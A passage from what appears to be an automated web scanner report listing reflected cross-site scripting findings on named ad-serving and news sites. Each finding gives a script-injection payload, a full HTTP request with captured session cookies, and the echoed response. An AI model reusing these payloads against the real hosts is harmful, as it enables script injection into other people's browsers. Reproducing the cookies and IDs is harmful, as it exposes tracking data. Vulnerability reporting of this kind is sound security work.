QYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwSKXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15097%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:10 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=2795701947817126467&fpid=fab5a"><script>alert(1)</script>ac6ea673d6b&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.68. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8e57"><script>alert(1)</script>47517675025 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=f8e57"><script>alert(1)</script>47517675025&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:12 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:11 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4450431897712270631&fpid=4&nu=n&t=&sp=f8e57"><script>alert(1)</script>47517675025&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.69. http://sitelife.floridatoday.com/ver1.0/daapi2.api [jpcb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpcb request parameter is copied into the HTML document as plain text between tags. The payload 476ae<script>alert(1)</script>8cce851e406 was submitted in the jpcb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%22%7B%5C%22ObjectType%5C%22%3A%5C%22Requests.External.ArticleRequest%5C%22%2C%5C%22ArticleKey%5C%22%3A%7B%5C%22ObjectType%5C%22%3A%5C%22Models.External.ExternalResourceKey%5C%22%2C%5C%22Key%5C%22%3A%5C%2220110508.floridatoday.A9105080319.article.NEWS01%5C%22%7D%2C%5C%22ViewTrackRequest%5C%22%3Afalse%7D%22%7D%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb476ae<script>alert(1)</script>8cce851e406&jpctx=request_0 HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188; digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Mon, 09 May 2011 14:01:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm210l3pluckcom
Set-Cookie: SiteLifeHost=l3vm210l3pluckcom; domain=floridatoday.com; path=/
Set-Cookie: anonId=4ae39088-1ee3-4bbf-8702-891e1328eb05; domain=floridatoday.com; expires=Tue, 08-May-2012 14:01:16 GMT; path=/
Date: Mon, 09 May 2011 14:01:16 GMT
Content-Length: 3076

PluckSDKjpcb476ae<script>alert(1)</script>8cce851e406({
"Envelopes": [
{
"PayloadType": "Responses.External.ArticleResponse",
"Payload": "{\r\n \"Article\": {\r\n \"ArticleKey\": {\r\n \"Key\": \"20110508.floridatoday.A9105
...[SNIP]...

3.70. http://sitelife.floridatoday.com/ver1.0/daapi2.api [jpctx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpctx request parameter is copied into the HTML document as plain text between tags. The payload 81cf3<script>alert(1)</script>472e56e0cef was submitted in the jpctx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%22%7B%5C%22ObjectType%5C%22%3A%5C%22Requests.External.ArticleRequest%5C%22%2C%5C%22ArticleKey%5C%22%3A%7B%5C%22ObjectType%5C%22%3A%5C%22Models.External.ExternalResourceKey%5C%22%2C%5C%22Key%5C%22%3A%5C%2220110508.floridatoday.A9105080319.article.NEWS01%5C%22%7D%2C%5C%22ViewTrackRequest%5C%22%3Afalse%7D%22%7D%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb&jpctx=request_081cf3<script>alert(1)</script>472e56e0cef HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188; digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Mon, 09 May 2011 14:01:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm210l3pluckcom
Set-Cookie: SiteLifeHost=l3vm210l3pluckcom; domain=floridatoday.com; path=/
Set-Cookie: anonId=23ef99e6-27a2-49a5-8051-e7ec0f9a803b; domain=floridatoday.com; expires=Tue, 08-May-2012 14:01:18 GMT; path=/
Date: Mon, 09 May 2011 14:01:18 GMT
Content-Length: 3076

PluckSDKjpcb({
"Envelopes": [
{
"PayloadType": "Responses.External.ArticleResponse",
"Payload": "{\r\n \"Article\": {\r\n \"ArticleKey\": {\r\n \"Key\": \"20110508.flori
...[SNIP]...
al.ArticleResponse\",\r\n \"ResponseStatus\": {\r\n \"StatusCode\": \"OK\",\r\n \"Exceptions\": [],\r\n \"ObjectType\": \"Models.System.ResponseStatus\"\r\n }\r\n}"
}
]
},'request_081cf3<script>alert(1)</script>472e56e0cef');

3.71. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://static.nme.com
Path:   /themes/default/static_images//themes/default/images/footer_bkgrd.gif

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 16820-->8bd07968a3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /themes16820-->8bd07968a3a/default/static_images//themes/default/images/footer_bkgrd.gif HTTP/1.1
Host: static.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmc=112756251; __utmb=112756251.2.10.1304949643; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache
Pragma: no-cache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:03:14 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 5eeb5799cec8cc65da155e0eb1098290cdcddc27"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 23|[{"Type":"LOG"},"ic: "]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3760"]|
X-Wf-1-1-1-8: 30|[{"Type":"LOG"},"mu: 4456448"]|
X-Wf-1-1-1-9: 38|[{"Type":"LOG"},"ts: 0.1827130317688"]|
X-Wf-1-1-1-10: 23|[{"Type":"LOG"},"ct: "]|
Content-Type: text/html
Cache-Control: must-revalidate, max-age=2591999, post-check=0, pre-check=0
Expires: Wed, 08 Jun 2011 14:03:14 GMT
Date: Mon, 09 May 2011 14:03:15 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 38325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified (themes16820-->8bd07968a3a) -->
...[SNIP]...

3.72. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e4eb"%3balert(1)//5e3e6b7f4d2 was submitted in the action parameter. This input was echoed as 9e4eb";alert(1)//5e3e6b7f4d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD9e4eb"%3balert(1)//5e3e6b7f4d2&cwrun=200&cwadformat=728X90&cwpid=536156&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP118
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 06 May 02011 16:58:30 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5918
Date: Mon, 09 May 2011 14:00:11 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 09-May-2011 16:46:51 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536156";var cwtagid="101378";var cwadformat="728X90";var ca="VIEWAD9e4eb";alert(1)//5e3e6b7f4d2";var cr="200";var cw="728";var ch="90";var cads="0";var cp="536156";var ct="101378";var cf="728X90";var cn="1";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase()
...[SNIP]...

3.73. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff8b7"%3balert(1)//c29357cb3b5 was submitted in the cwadformat parameter. This input was echoed as ff8b7";alert(1)//c29357cb3b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90ff8b7"%3balert(1)//c29357cb3b5&cwpid=536156&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:14 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="536156";var ct="101378";var cf="728X90ff8b7";alert(1)//c29357cb3b5";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _
...[SNIP]...

3.74. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3593"%3balert(1)//afb37673b17 was submitted in the cwheight parameter. This input was echoed as e3593";alert(1)//afb37673b17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536156&cwwidth=728&cwheight=90e3593"%3balert(1)//afb37673b17&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
